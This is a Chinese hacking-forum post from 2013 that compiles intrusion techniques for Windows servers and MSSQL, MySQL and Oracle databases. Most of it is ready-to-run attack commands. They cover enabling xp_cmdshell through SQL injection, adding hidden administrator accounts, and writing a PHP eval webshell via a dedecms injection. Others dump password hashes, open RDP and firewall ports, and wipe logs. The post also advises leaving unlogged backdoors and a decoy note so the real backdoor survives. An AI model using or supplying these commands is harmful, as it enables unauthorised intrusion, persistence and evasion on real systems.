中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
4 |$ i* e) s9 {* F5 y3 j, ^0 D
1.net user administrator /passwordreq:no) x( `+ j# ?, ?- T2 i' ^
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
& Q3 |5 w% S/ Q& U2.比较巧妙的建克隆号的步骤
& n8 r9 c/ Q: D; V先建一个user的用户- A/ u6 X$ f* V6 S( Y
然后导出注册表。然后在计算机管理里删掉
5 L. e7 ?' u1 g8 b在导入,在添加为管理员组
) y3 B; Q8 C  t8 z+ m3.查radmin密码3 {! m- d% U+ G5 c% C
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
2 \! C4 s8 |! U9 V* [4 R4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
" ~# t# c  C4 v& p$ N1 B% i' @建立一个"services.exe"的项
, f% ]! q' Q7 ~" i* h4 ~9 k8 C4 t再在其下面建立(字符串值)
. H; Q, B, l- J9 F" S8 w! Z键值为mu ma的全路径
5 h3 {4 a& N% Q! P( p5.runas /user:guest cmd
. J2 t% D" H' E; h7 p: s; s# H- e) i测试用户权限!; ~# y+ @3 F: U) v/ Z2 N* t
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
' ]) ^! h; d5 {- o; q  d& X7.入侵后漏洞修补、痕迹清理,后门置放:
- a4 |# _- P: K2 C* n' V基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
" ^& S( F9 C" Z/ J" I  g, ?+ `$ j9 ^8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c+ Z9 V; p6 j8 ~! ^- y7 X8 b: C1 A

8 ?+ e$ s, B7 S- ufor example
, E. m" J; J/ C# a3 ^) j# n+ k; L2 j1 E! C# B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
+ N9 ^. L! r% _! t- f1 {
6 e3 a8 X5 J- i2 H1 @# X) A# hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
4 |( l" m0 P* D$ r5 w- R0 A0 L
5 {3 W; v4 c6 \- M6 f* s9:MSSQL SERVER 2005默认把xpcmdshell 给ON了1 n+ z; S( s5 q! S# g
如果要启用的话就必须把他加到高级用户模式0 C/ J4 k( V# F' K7 X0 E
可以直接在注入点那里直接注入2 C( c1 ~$ N' T8 d: k9 m0 u
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--  p) j2 _) m! E: a  `  v7 P2 C; g
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--) Q2 H( l  E, o& c) W( J, }/ S
或者
4 Y8 ?, \6 A+ ^sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 O, R% ~' z; S, K来恢复cmdshell。% b2 n) Q+ y& e+ t) k: Z

& o9 E* F) U- ]; V9 X分析器
" w$ B5 s9 m% J9 Z; H: h3 JEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--% R$ ^# T% Z! Y' k
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")8 |/ a2 _7 f. c/ C0 L
10.xp_cmdshell新的恢复办法* m5 t; _! `, z2 E
xp_cmdshell新的恢复办法( E9 `+ P8 P+ [5 X$ t
扩展储存过程被删除以后可以有很简单的办法恢复:3 U* i& X- l; g# e: _
删除
5 d8 ^; |/ x% w$ b+ Fdrop procedure sp_addextendedproc
4 b  G! n8 y# O4 B6 fdrop procedure sp_oacreate# {5 K& x$ ]' `* q
exec sp_dropextendedproc 'xp_cmdshell'7 D4 ?9 N+ w( v5 H6 E3 Q

! S) _7 z: ]1 M! f$ s. y恢复" m2 [. \  `. V
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
! s6 d$ L- `7 Pdbcc addextendedproc ("xp_cmdshell","xplog70.dll")  S" w# {2 B5 m( x
6 D6 f. ^6 ^- }
这样可以直接恢复,不用去管sp_addextendedproc是不是存在: w& v& r& U: }. m

4 F# J6 y1 H7 Z9 z& E# ?3 I-----------------------------) {' }. R  I# c; z; x

* r8 M6 v" _) T/ w7 W5 b4 C删除扩展存储过过程xp_cmdshell的语句:
( \- p6 a; I+ S& i4 F0 jexec sp_dropextendedproc 'xp_cmdshell'( v# z' c  L0 e. d: N" O0 ?

! O, k& Z- `$ ?, C恢复cmdshell的sql语句6 p( p5 }* o3 c* ^/ g
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'7 A$ S+ l3 s9 e5 A. b' |5 V3 r

2 V" ^9 J+ i/ o
$ S2 M$ G3 K4 }- O3 ^+ @' J开启cmdshell的sql语句
. m# O% z5 M$ @" d. M
  b% h" r+ }3 J8 {6 wexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'/ R$ ?3 F' d' k3 I
/ O5 z/ @6 l+ x; b# G: o, a! u
判断存储扩展是否存在
3 e; A1 g5 Q' s% T7 A7 Q' Cselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'* l' T& g3 U- q/ P
返回结果为1就ok
1 o0 x+ M; @' V( q, L
) `/ o' W8 B& D' }$ {恢复xp_cmdshell1 H. C; k' o. g/ c0 i9 t' c% p
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 y- h4 A; [% H& u# f% Y5 M
返回结果为1就ok
% s) r' Q$ V/ t# S/ o3 U& }' G5 u8 y. X# m- U% {7 j' s5 G2 B
否则上传xplog7.0.dll
) v7 ]8 r+ H5 ]exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
; h1 j4 `, _) R1 A- s8 w
4 R2 H# X1 M# P+ ~% g# A8 j) q堵上cmdshell的sql语句
: D+ H: k, o+ |" j, M4 ssp_dropextendedproc "xp_cmdshel$ N- M6 P2 z! c5 z7 i' }. _; w
-------------------------
0 ^9 ^. E2 w, f; [$ r  ~清除3389的登录记录用一条系统自带的命令:- k! O- H/ P* ^/ j
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
* }* ~9 W, ]2 e$ R
) y# Z$ U1 L! s- m/ c# ?& q然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& K, a  E' d7 m: w
在 mysql里查看当前用户的权限, f# f( ]: N! P9 _7 F9 D  _+ T. h
show grants for  
  B6 W5 N4 W% z' F  h$ o8 Y: u
8 j9 Q# [7 Z! v6 c" j以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 Q5 s0 n9 q" u3 d8 \* b6 I. a, ?8 R  P9 |; ^9 K! S

. A( ]5 t3 Q" g  F+ C7 M3 Q. R3 W: jCreate USER 'itpro'@'%' IDENTIFIED BY '123';* }7 i) @9 g. \; k6 H2 ~. D# n
, c0 E. n9 ^4 C0 h6 e% g1 c
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
5 \' Q% W" E3 F$ [+ J6 S! G, o  C! G% t! T/ V8 X6 C& b
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. v) }( W' k' O; x/ v1 k. U; a" V; A
; d1 [1 n: g$ ]
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 D- @$ A8 v$ M; l" k; D
" c  F4 V: R- @9 _5 B  t9 R
搞完事记得删除脚印哟。9 i4 {: |1 S, X+ e$ k$ q: c

$ l) f! j% f4 o+ QDrop USER 'itpro'@'%';
! Y6 o2 u. l2 C8 r8 w5 d5 x2 k$ `4 [9 R. e6 e1 s8 F7 g
Drop DATABASE IF EXISTS `itpro` ;
6 ~+ `1 v# o" b$ \6 t9 V) ]3 W6 V2 ?# R2 C# [; ^
当前用户获取system权限
, e  [% w  E1 \sc Create SuperCMD binPath= "cmd /K start" type= own type= interact% `5 Z7 i1 H2 L! p; |1 b1 I0 M2 D
sc start SuperCMD
- O& R2 u. H( ]9 k% t! g" c程序代码
. n8 L# Y$ f( d: m, @3 x6 F# n<SCRIPT LANGUAGE="VBScript">4 \3 l) y$ G8 e
set wsnetwork=CreateObject("WSCRIPT.NETWORK")% G  L/ N5 i) ?- g, G
os="WinNT://"&wsnetwork.ComputerName
( n6 ~+ I9 _+ }# |1 oSet ob=GetObject(os)
' Q4 b6 v+ p" p0 u! V/ a3 MSet oe=GetObject(os&"/Administrators,group")
) c. V$ s( }" L9 CSet od=ob.Create("user","nosec")
/ a! c3 U. f3 {( ?od.SetPassword "123456abc!@#"
2 i+ {( k' l# ~( e2 Q+ Bod.SetInfo
0 ^: w4 d8 e/ W7 J1 SSet of=GetObject(os&"/nosec",user)  F; o8 T& ]9 r4 G5 Q
oe.add os&"/nosec"! c/ M- v* m6 F! `3 E
</Script>+ g5 U  o$ D) R$ p5 P
<script language=javascript>window.close();</script>; j, A) d# I+ p: U1 J' I- |9 Q

, E5 @. g% t" R7 `) I" a: G0 F; X$ l& m, g, T; ^7 P

& q% d, Z5 r2 m0 H* {; T% {- K) Z8 I. W  K' l$ ^, _, @/ [, a# P
突破验证码限制入后台拿shell" `& p; D+ g2 o" H1 T% _1 i$ ~
程序代码
/ L+ y* L# S  n& w6 w; M" F" n$ vREGEDIT4
1 [9 @+ y3 E3 d! t% b- b[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
. H8 f8 s* A2 p* Q# u" c1 ^8 r"BlockXBM"=dword:00000000: t) t4 j5 L" ?. O0 M' Z% m! c3 G0 b

$ s1 w! \" m. w- t  O9 O: Z% Q保存为code.reg,导入注册表,重器IE
; r: b9 x" m5 x: N& `4 L# k就可以了
4 \: F7 \% m. x- E7 |6 w% Z  e3 N. b% Wunion写马
' B. U1 _* w/ Y9 o# I$ ~: t, G0 p程序代码
, _( S5 |% c6 U; O# C4 O. _# K7 Awww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*$ C2 I! C9 s4 e, b$ T  s
) T$ r+ u! u4 l# Y
应用在dedecms注射漏洞上,无后台写马
3 T0 |/ V  {# P9 [% C# G$ udedecms后台,无文件管理器,没有outfile权限的时候
. ]' w5 i" H  f. g) \在插件管理-病毒扫描里
5 y6 i* S" D9 t0 S& |) k& f; u写一句话进include/config_hand.php里
! I# D5 ?' h- n1 ]7 z; b' J0 M9 o程序代码
$ ?, M4 M: F+ l# \! e>';?><?php @eval($_POST[cmd]);?>
2 |' R8 b3 @* @8 U# ]( S( E- w7 {+ L. |: t

0 `+ y" f, G4 |2 t- ^( t如上格式, S6 i* I1 e8 l1 P
6 }" e  X% u) `/ F2 x
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解/ ~! Y8 [& ]1 j( Y4 ]8 A2 x
程序代码" J- ]5 m2 ^# a
select username,password from dba_users;
) J' _6 ~6 h# B2 ^$ [
% R" I! C; B& t; t  g/ Y/ o. [! E0 E( K% F6 E9 q0 C
mysql远程连接用户! @6 T( P% J- t8 ~. N
程序代码
6 o: ^- u$ T: M2 o5 m+ ]) q7 b
5 F0 b* r) ~3 Z% `6 n) BCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, V. E, d7 B9 H: ^  L7 V8 A
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION3 W% ~& Y8 |  E$ `$ n8 v+ C: j2 v
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
' e# r5 `+ c+ T" T1 G/ U1 `; yMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;2 u) p$ \: E. }# n& p. v

6 G/ k! A" M  `; m: ]4 g' z6 Q; m1 e6 ?8 b/ |* p% u& G! e
% K: y: s! _- i" x
0 Q( j6 G0 q% w* P: B2 S- x
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
" f- H1 R$ c* t" ?2 Q' l
3 `% d5 P: G  ~' j, u. Z1.查询终端端口# _0 v( M8 p3 Y) V( H
: E0 y0 u5 f) |1 t: n- v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber6 u3 }; w( o5 B& y- s

0 l5 m" n! P% h1 @5 b& p6 d: p) E通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"0 p7 ~/ U& w! i! s+ Z
type tsp.reg
' n/ u$ t: W7 A0 z, }  A4 [* ~
) H& A/ {# L* z9 C7 w& Y2.开启XP&2003终端服务. Y# m; K, H; i1 A2 |5 y% |& m* W/ V0 x

% F6 X8 S0 ^' l+ N
8 L- `8 M: O$ F9 I! ^REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
2 E6 k( }* U( [6 H; z
7 J0 x1 }5 w# {9 D- I$ w, Z* n5 W: E9 K: y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4 J. P8 Z6 i. d) j- ^
/ }. u5 C2 K; ]/ W% d  `; |  a- m# l3.更改终端端口为20008(0x4E28)
' W; t* ~, e7 ?$ k8 W
; B4 v+ \1 `  S- \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& a. t$ Y2 @' T+ p& ~
! a! Z( b" W% u1 J; w1 ]: c" dREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: H1 T8 J' J0 p; g/ e# j  Y6 Q
2 N; _) q( U  b1 l% r, o
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制9 X" I5 u3 s. ^4 h. G! ~
% r' d/ |6 m* h0 Z  N
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
! `/ X! z2 F" _$ E, L3 P$ h) U4 W; L9 v2 ^8 U! \- x0 P/ ]

. |3 f0 H& I7 H# v5.开启Win2000的终端,端口为3389(需重启)
) a6 n6 J0 t- T' ~0 |' z# J( {- B% R6 ^$ {2 ?! e( h
echo Windows Registry Editor Version 5.00 >2000.reg 8 E$ f2 C0 F8 s; ^6 ?
echo. >>2000.reg
" |4 K5 M: d  R, Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ; `7 o; }' U- Z( e6 R
echo "Enabled"="0" >>2000.reg
; k3 r2 Z. X; Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 3 J( \! k6 x: J0 x
echo "ShutdownWithoutLogon"="0" >>2000.reg
; h8 Y0 t; [# L6 decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
. p# u- k: I$ D% S- d3 oecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg " k8 Y) s) ^% z# e- Y) o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg . g( t2 C" @& Q
echo "TSEnabled"=dword:00000001 >>2000.reg
7 S, F. G; a0 h* M/ c2 w' gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg , S* O5 }4 p  x+ J, u1 a. B: n* N
echo "Start"=dword:00000002 >>2000.reg
) g: v# j6 M2 t! zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
+ B0 ?/ k! C! K* s( Vecho "Start"=dword:00000002 >>2000.reg
, I: F) v& A- G* `, oecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 2 @# o( t/ m6 c  X- X  c
echo "Hotkey"="1" >>2000.reg % v3 f9 `  o3 d. s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
0 g( v3 {4 R# O% d/ u6 p% ~echo "ortNumber"=dword:00000D3D >>2000.reg
4 W- Z' |9 j# F3 t+ O5 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
3 Q3 H; z9 X0 P7 S/ O$ Wecho "ortNumber"=dword:00000D3D >>2000.reg
- z, G4 `- c0 C8 j  {% G3 @/ x! e5 x3 y+ w# y
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
0 G8 F# ?: q/ N) ~6 v  Q  j* d; H; `4 c. `5 s4 S
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
2 L* t+ [! |) B  r(set inf=InstallHinfSection DefaultInstall)
1 l" m+ M; U, |0 X# c3 Z0 Recho signature=$chicago$ >> restart.inf, `+ `1 X! X7 |* r
echo [defaultinstall] >> restart.inf
( Y, [3 {1 F: D! K/ e( Xrundll32 setupapi,%inf% 1 %temp%\restart.inf, F" x9 |% K; t2 N# l

: a6 M$ ?; e# U0 U- ^. M, f$ E& r- f) E% R( R' r
7.禁用TCP/IP端口筛选 (需重启)
  K$ |3 z8 W5 e, p* j( Y; R7 j5 X
7 R9 z/ s/ A: lREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
0 V; u& w- L( [) v( f3 }) @" D7 O' _
1 c- ?6 X' }# G5 _  t8 Q( q8.终端超出最大连接数时可用下面的命令来连接
$ P( A3 M" M; Q9 T* j4 a4 f! m1 k: b2 F/ m( Y
mstsc /v:ip:3389 /console
( ]* Y" j, K1 j4 `& T7 x# C) e# @& @2 T3 P6 @
9.调整NTFS分区权限
* T$ _4 _) c9 f/ _# N
, I4 O/ y; i! o  K4 i0 M/ p& Ucacls c: /e /t /g everyone:F (所有人对c盘都有一切权利): W* v- A% A8 u6 P0 b5 B& F
! e% m+ c. Y1 U& `- a
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
* R1 j9 t2 |! M1 h4 i7 `4 q* v. O' D# X8 R2 Q& i0 D
------------------------------------------------------
! U! x- z. j. B1 q3389.vbs 9 I: u) c8 b; ^/ j# i$ V( ?$ \
On Error Resume Next# b' y9 Q* ?& J* P2 |: r, G( E
const HKEY_LOCAL_MACHINE = &H80000002
1 }* f2 K$ e) p# R& \- v, n  u/ v7 xstrComputer = "."9 P& r& M" H0 g% e
Set StdOut = WScript.StdOut
; _9 y  X. t$ k" l9 f2 L  FSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_+ l: S0 ~8 T) {: P* y2 s  e/ u' Y* b
strComputer & "\root\default:StdRegProv")
) o7 P) L7 d# Q  K3 nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 s: |: A6 D  M. q+ h9 e- xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 W( [3 V! P% N" Z& [" M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 z& D1 l. u4 g( `oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. ^3 @9 v# s7 v, P& R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
. ~! r, H0 z0 e3 i* r: t/ OstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
( [$ n8 r" y5 N! [. g( astrValueName = "fDenyTSConnections", W0 i5 T7 m% A! @7 R& h
dwValue = 06 G) H5 L! V, w9 y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# P$ m6 @4 R( z+ R  t" c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp") @$ C% s, @, T0 w+ ]
strValueName = "ortNumber"  t* z; G/ Y% u
dwValue = 3389
; K' m/ ~0 R. K2 b0 ]oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue% G5 f7 l8 l* ~! o) M  A/ N. C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" a* Y, O+ F! U9 t0 R* ystrValueName = "ortNumber"
5 n( H( H2 C$ @# s% _$ a, j% D4 ddwValue = 3389  V4 M. O6 @1 j- J, Q
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue' U' R8 ?8 y$ j
Set R = CreateObject("WScript.Shell") 8 {- z9 ]* L) ~9 e# m
R.run("Shutdown.exe -f -r -t 0") 0 Y: I, K* z  Y
  X! @$ E' K: R5 H. `- C$ L0 M
删除awgina.dll的注册表键值" l  Y9 V4 V5 {6 u* o# q" {8 X& A
程序代码
& B. ?- k9 C5 j7 D
/ |! q2 J3 P$ K& c' Nreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
3 `% Q9 z; y" Q( [* u% g! O1 y
2 v. o/ u2 d7 N& X, Q; Z' K  I# ^
# `* i) {/ u# J! f- m$ U1 Q1 R5 r9 p1 M9 v0 }6 R) P4 q* Y
, M; d! M% q$ u! e/ K- Q
程序代码" ^0 m$ p* v9 e8 ?, a" |
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash) C- p( n8 A$ B0 B/ f

2 b6 y4 _* p4 M# g1 [) m设置为1,关闭LM Hash
6 e5 x5 \; u1 i& S4 P& n8 Q3 W- c) h  |5 }+ ^& P9 K
数据库安全:入侵Oracle数据库常用操作命令
- L5 o- b. J$ m- q最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
0 F5 K5 P0 Y( B  c+ z3 {2 W1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ [0 S) w) ?! \
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;3 ]4 X5 y! p# P+ s% s
3、SQL>connect / as sysdba ;(as sysoper)或1 D) F6 L) {% O: V# l1 ?! g
connect internal/oracle AS SYSDBA ;(scott/tiger)) F9 x8 ^" Z, }) w7 K7 a! u+ G0 m
conn sys/change_on_install as sysdba;
2 G0 E2 {5 j2 l# \# }4、SQL>startup; 启动数据库实例- Z" Q( C" a( x" j7 C
5、查看当前的所有数据库: select * from v$database;: p% _+ ^; n$ x: Y: |: a. U
select name from v$database;
0 ^8 t# Q! _  G& y+ y+ x6、desc v$databases; 查看数据库结构字段) z9 c$ y- c! `# E$ j0 B% K
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
5 e  r0 m5 z7 f. USQL>select * from V_$PWFILE_USERS;+ }, @) ]0 I3 T% |# U0 J' d
Show user;查看当前数据库连接用户
  ]7 w6 |1 J! ]8、进入test数据库:database test;
) `) W/ l6 V6 G) D9 r( a9、查看所有的数据库实例:select * from v$instance;" [) F; m, z+ z  C$ J' g
如:ora9i
3 b' N7 |% y+ f8 h% D9 z1 ]10、查看当前库的所有数据表:5 e& z9 W/ Z& g: p! n. |3 Z3 e
SQL> select TABLE_NAME from all_tables;
7 o4 w0 q$ y# iselect * from all_tables;
& u& j1 M! b- ~. j" V4 B% nSQL> select table_name from all_tables where table_name like '%u%';: f, L" Y, H, V* d
TABLE_NAME
( W' m/ ]1 M2 C1 J$ {2 g------------------------------) t$ Z5 N$ {' m. H4 C  x4 s
_default_auditing_options_
2 x6 z# Y  f& n: r11、查看表结构:desc all_tables;9 x# c1 A9 i: x4 b1 t
12、显示CQI.T_BBS_XUSER的所有字段结构:8 _: b2 S, f- U! `2 c$ f7 `5 j
desc CQI.T_BBS_XUSER;
8 b. Y# }, P; b6 W- e2 |1 `13、获得CQI.T_BBS_XUSER表中的记录:
+ H8 Q3 _$ u# l( T0 zselect * from CQI.T_BBS_XUSER;
6 ?2 M( l& n4 Z& U0 k4 Q14、增加数据库用户:(test11/test)  g8 I  g& Z! D- a! l
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;$ X& _+ i2 J' _: r1 b1 h" N
15、用户授权:- g7 X9 i2 K7 P! p( H# f5 H
grant connect,resource,dba to test11;
; |% A5 n8 f/ g' dgrant sysdba to test11;
. e, m# _# e2 B) v$ B" d5 I# J  Qcommit;
3 U: Z+ y" Y  ^0 X+ o5 n# x: q16、更改数据库用户的密码:(将sys与system的密码改为test.)
( ?7 O& t) H0 r* s2 [alter user sys indentified by test;
- `# k: v( V  d* A! _8 X* Aalter user system indentified by test;
1 u) a" y$ H  y, P* x7 [1 N; H
applicationContext-util.xml
; h% }' l* C" j6 d% A3 f& n+ XapplicationContext.xml
% M; A; z; @' R& J$ [6 ~struts-config.xml
) q, T# p. r6 ]web.xml
. m6 _+ A! c( m6 r2 ?server.xml+ X: A4 [4 H" n$ N2 p
tomcat-users.xml4 y; X  y+ J0 k
hibernate.cfg.xml" x7 r5 t2 |0 E0 l
database_pool_config.xml0 J; d# {% n# O7 T

& d. c" W5 }9 V* t
3 r( ]3 m8 e2 x' Z$ l  P\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! W9 j8 H2 t6 Z5 o3 ?9 c8 p
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini& a6 F8 k: S1 G4 H* o/ ?
\WEB-INF\struts-config.xml  文件目录结构
; ~4 m7 L: v. C# F! S
: {0 u) y4 M! E6 [. M4 p) y4 sspring.properties 里边包含hibernate.cfg.xml的名称
! P  S; `/ B! W, I  z6 [: x( u6 t3 @5 p9 D0 R" Z) Q0 f% n
  W! W6 y+ y# y# z
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
9 N. E: E9 A; A+ p8 x  T4 z7 E! @, v
如果都找不到  那就看看class文件吧。。9 S9 m& e6 ]: T6 D( H2 l9 p2 K

8 l9 ~2 l+ E7 u! l4 Q4 h, E测试1:
% C3 A7 ~" @" W3 ~! c' A  ~, K! {SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
* a* c0 P2 B* B3 v, M: y0 l1 n+ m$ s' G+ n% L9 [; a
测试2:
" L' C3 a! P7 P! Z$ L0 x9 {4 S
% A& b# K; V8 `" n& Ycreate table dirs(paths varchar(100),paths1 varchar(100), id int)
/ s" s1 {' |3 e! t0 X4 Z  R9 s; p; t! i4 s5 E* c1 f! _7 G
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 L$ A5 B2 t: S% c+ P8 P3 E
- V. t$ C  K0 ~
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* }' w+ D* y0 d% N- u$ x0 m1 F9 c# W# N! u9 v+ a
查看虚拟机中的共享文件:* P9 d6 b& p8 ^* S: |3 ~
在虚拟机中的cmd中执行. i( u2 k( C, K9 @9 x, N/ g' {
\\.host\Shared Folders2 g! `4 X2 I+ j; z7 L/ H5 }6 j

2 U  D# R$ P3 H1 t7 \5 T1 Bcmdshell下找终端的技巧
5 m) u8 u4 ~! r# ]5 ?2 k" a找终端: ! _, C2 G  A3 M0 O$ w
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 3 p1 ?/ x7 I/ K; f- J
   而终端所对应的服务名为:TermService + D+ R( s6 `. N# [( ?# G! h
